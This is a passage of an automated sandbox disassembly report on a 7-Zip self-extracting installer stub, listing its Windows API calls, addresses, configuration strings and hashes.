??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
CoInitialize.OLE32(00000000), ref: 004062F2
_wtol.MSVCRT ref: 00406338
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
GetKeyState.USER32(00000010), ref: 004063BE
??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
_wtol.MSVCRT ref: 0040686C
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53

Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77

Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF

??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253

Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50

Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64

??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F

Strings

sfxconfig, xrefs: 00405A8A, 00405C55
GUIFlags, xrefs: 00405EB1
" -, xrefs: 0040606F
hidcon, xrefs: 004067E7
waitall, xrefs: 00406742
InstallPath, xrefs: 004062FC
7zSfxString%d, xrefs: 00405D24
nowait, xrefs: 00406805
RunProgram, xrefs: 00406383, 0040649A, 004064A8
Shortcut, xrefs: 00406C04
sfxelevation, xrefs: 004058BD, 0040606A
amd64, xrefs: 004068EB
GUIMode, xrefs: 00405E8E
OverwriteMode, xrefs: 00405E4A
ExecuteParameters, xrefs: 00406964
FinishMessage, xrefs: 00406C73
ExecuteFile, xrefs: 0040637E, 00406476, 00406484
setup.exe, xrefs: 004066C9, 004066CE, 00406729
BeginPromptTimeout, xrefs: 00405F95, 00406325
del, xrefs: 004068A1
SetEnvironment, xrefs: 004061A1, 004061A9, 0040623A
x64, xrefs: 004068FE
sfxversion, xrefs: 0040585C
sfxwaitall, xrefs: 004058A1
shc, xrefs: 00406881
BeginPrompt, xrefs: 0040638E
7-Zip SFX, xrefs: 00406D53
i386, xrefs: 004068D8
x86, xrefs: 004068C5
SelfDelete, xrefs: 00405F14, 00406CD9
bpt, xrefs: 00405F7C
forcenowait, xrefs: 00406829
HelpText, xrefs: 00406279
7ZipSfx.%03x, xrefs: 0040656E
Delete, xrefs: 00406C2C
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406D58
MiscFlags, xrefs: 00405ED4
AutoInstall, xrefs: 004063F0, 0040644B, 004067B0

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
API String ID: 1141480454-1804565692
Opcode ID: c0334711d10703709c864e1cd44722a16f8881afa6fe96d19eaeb4a4b564a2b9
Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
Opcode Fuzzy Hash: c0334711d10703709c864e1cd44722a16f8881afa6fe96d19eaeb4a4b564a2b9
Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d201eaa13ed0c99f1289f47a79b6737f8456d04a4ba63ef490ec239e3ccbb8
Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
Opcode Fuzzy Hash: e9d201eaa13ed0c99f1289f47a79b6737f8456d04a4ba63ef490ec239e3ccbb8
Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
GetProcAddress.KERNEL32(00000000), ref: 00402386
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

Strings

GetNativeSystemInfo, xrefs: 00402375
kernel32, xrefs: 0040237A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
SetLastError.KERNEL32(00000010), ref: 004033AA

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D

Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
SendMessageW.USER32(00008001,00000000,?), ref: 00401246

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00404F8B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
ShellExecuteExW.SHELL32(?), ref: 0040500A
WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
CloseHandle.KERNEL32(00406A69), ref: 0040502B
??3@YAXPAX@Z.MSVCRT(?), ref: 00405032

Strings

$gA, xrefs: 00404FBE

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
String ID: $gA
API String ID: 2700081640-3949116232
Opcode ID: 3710b6e2b1ee8c3939e1228fdf7b12ebd08f98fec71f301bbfc3479c91d62d09
Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
Opcode Fuzzy Hash: 3710b6e2b1ee8c3939e1228fdf7b12ebd08f98fec71f301bbfc3479c91d62d09
Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
DispatchMessageW.USER32(?), ref: 00401D73
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

Strings

Static, xrefs: 00401D44

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: c6cac6823dad6bcefe5525f74f9ffb8c6f410304bbed9cd84b72b707b4a92466
Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
Opcode Fuzzy Hash: c6cac6823dad6bcefe5525f74f9ffb8c6f410304bbed9cd84b72b707b4a92466
Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040F230
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1

Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E

Strings

{D@, xrefs: 0040F290, 0040F2A7
pmA, xrefs: 0040F2EB

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: pmA${D@
API String ID: 3431946709-901781089
Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4

Strings

k7@, xrefs: 00401B78

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID: k7@
API String ID: 635176117-1561861239
Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4

Strings

DmA, xrefs: 0040EA31
{D@, xrefs: 0040ED6C, 0040EED8

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@
String ID: DmA${D@
API String ID: 1033339047-1777112864
Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-0
Opcode ID: 8b5b25c4d5090c878f1a349e70dac13a2a131b771ee91088d389839b1187af6f
Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
Opcode Fuzzy Hash: 8b5b25c4d5090c878f1a349e70dac13a2a131b771ee91088d389839b1187af6f
Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F

Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,009B8FD0,00000002), ref: 00402334

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
wsprintfW.USER32 ref: 004049B0

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Strings

7zSfxFolder%02d, xrefs: 004049AA

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
